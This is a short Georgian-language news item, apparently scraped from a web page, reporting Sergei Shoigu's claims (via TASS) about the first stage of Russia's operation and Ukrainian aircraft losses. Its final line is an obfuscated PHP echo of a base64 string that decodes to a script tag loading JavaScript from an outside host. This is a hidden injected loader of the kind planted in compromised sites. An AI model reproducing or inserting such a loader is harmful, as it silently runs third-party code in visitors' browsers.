celsiusi
ავერსი საქკაბელი
რუსეთის თავდაცვის მინისტრის, სერგეი შოიგუს თქმით, დონბასის მოასხლეობის დაცვის სპეცოპერაციის პირველი ეტაპის ძირითადი ამოცანები შესრულებულია და ახლა, შესაძლებელია, რუსეთის შეიარაღებული ძალების ე.წ დონეცკისა და ლუგანსკის რესპუბლიკების გათავისუფლებაზე ფოკუსირება, ინფორმაციას ტასს.რუ ავრცელებს.
 
“ზოგადად, ოპერაციის პირველი ეტაპის ძირითადი ამოცანები შესრულებულია. უკრაინის შეიარაღებული ძალების საბრძოლო პოტენციალი საგრძნობლად არის შემცირებული, რაც საშუალებას გვაძლებს ძირითადი ყურადღება და ძალისხმევა მივმართოთ მთავარი მიზნის, დონბასის გათავისუფლების მიღწევას,” – აცხადებს შოიგუ.
 
შოიგუს თქმით, “უკრაინის შეიარაღებულ ძალებს მნიშვნელოვანი ზიანი მიადგა”. ” საჰაერო ძალები და საჰაერო თავდაცვის სისტემა პრაქტიკულად განადგურდა”. მისი თქმით, უკრაინის 152 თვითმფრინავიდან განადგურებულია 123, 149 შვეულმფრენიდან კი 77.
 
შეგახსენებთ, რუსეთმა უკრაინაზე სრულმასშტაბიანი თავდასხმა 24 თებერვალს გამთენიისას, ერთდროულად რამდენიმე დიდი ქალაქის, მათ შორის, კიევის დაბომბვით დაიწყო.
786
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");